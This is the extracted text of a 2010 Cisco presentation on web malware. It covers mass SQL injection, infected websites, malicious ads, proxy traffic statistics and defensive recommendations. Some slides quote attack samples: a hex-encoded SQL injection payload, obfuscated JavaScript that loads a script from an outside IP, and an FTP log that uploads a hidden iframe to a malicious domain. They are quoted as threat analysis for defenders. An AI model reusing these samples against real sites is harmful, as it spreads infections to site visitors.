  • 26. •  Infected thousands of websites with vulnerable ASP and Cold Fusion pages and MSSQL database. •  Infections persist to this day! •  How? Google hacking + run on anyPOST /somefile.asp ID=123;DECLARE%20@S schema SQL injection. %20NVARCHAR(4000);SET%20@S=CAST (0x4400450043004C004 … 0073006F007200%20AS %20NVARCHAR(4000));EXEC(@S); © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 26
  • 27. •  Victims infected with info stealer by drive-by download. •  Steals FTP credentials from victims. •  Obfuscated javascript code is inserted into any file that contains a <body> tag. •  New victims are infected through victim’s own website. •  Infected sites were de-listed by Google. document.write(unescape(‘Dp%3CscOCrmKfipa0tie%20sa0rDpc%3D4P%2FvI %2F94c30%2EOC2vI474P%2E2%2E1a095vI%2FOCj0yhqueier0yhy%2Ejs%3E <script src=//94.247.2.195/jquery.js></script> %3CDp%2Fsc30cri4Ppc30tDp%3E’).replace(/4P|mKf|0yh|c30|vI|ie|a0|OC|Dp/ g,"")); © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 27
  • 28. [SOCKS 5 header] USER victim PASS a 9-digit secure random password PASV TYPE I RETR //public_html/forum/db/index.htm PASV <iframe src="http://activeware.cn/ind.php" width="1" height="1" TYPE I alt="YTREWQhej2Htyu" STOR style="visibility:hidden;position:absolute”></iframe> //public_html/forum/db/index.htm QUIT Source: Christian Kreibich at ICSI Berkeley © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 28
  • 29. •  Whole website with aggressive SEO uploaded to compromised host. •  Hotlinks to images on legitimate websites. •  GIS queries send users to SEO site instead of image host. •  Links to drive-by download. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 29
  • 30. 30 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 30
  • 31. •  Malicious banner ads unknowingly served by Google and Microsoft. •  Caused a drive-by download. •  ScanSafe: 10% of hits via Hotmail. Adshufffle.com •  Installed fake AV. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 31
  • 32. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 32
  • 33. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 33
  • 34. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 34
  • 35. •  Phone-home data from thousands of IronPort web proxies. •  Anonymized traffic summaries. •  Web reputation: Bad, Neutral and Good. Default actions: Block, scan, allow. Plus content policies. •  Randomly sampled 1 billion clicks from pool of 3 trillion. •  Used actual action taken by the appliance. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 35
  • 36. Bad; 1% Good; 14% 93% Blocked 1% Blocked Neutral; 85% 3% Blocked © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 36
  • 37. Flash; 2% Other; 9% CSS; 3% Zip; 0% XML; 3% Binary; 3% Video; 5% Image; 45% Javascript; 13% HTML; 17% © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 37
  • 38. 0.90% 0.80% 0.80% 0.70% 0.60% 0.50% 0.40% 0.30% 0.20% 0.17% 0.20% 0.08% 0.07% 0.10% 0.00% Javascript Flash PDF Image Binary © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 38
  • 39. Good: 5% Bad: 21% Neutral: 74% © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 39
  • 40. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 40
  • 41. •  Users Targeted training designed to defend against social engineering. •  Host-level Patch browser and applications. Audit all applications and files on desktops. “Lock down” hosts where applicable. •  Network-level security Reputation and content scanning for all web objects. Secure HTTPS. Usability vs. security: block objects not pages. Active detection of infected users. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 41
  • 42. •  Secure web application development (OWASP). •  Vulnerability assessment before deployment. •  Regular penetration testing. •  Monitor site security and integrity. •  Pay attention to third-party software. •  Consider Web Application Firewall. •  Outbound scanning with AV/Safe Browsing. •  Two-factor authentication. •  IP-based access controls. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 42
  • 43. •  Compliance and auditing. •  Security posture. •  Third-party integration. •  Secondary usage of data. •  Geographical affinity. •  Incident reporting. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 43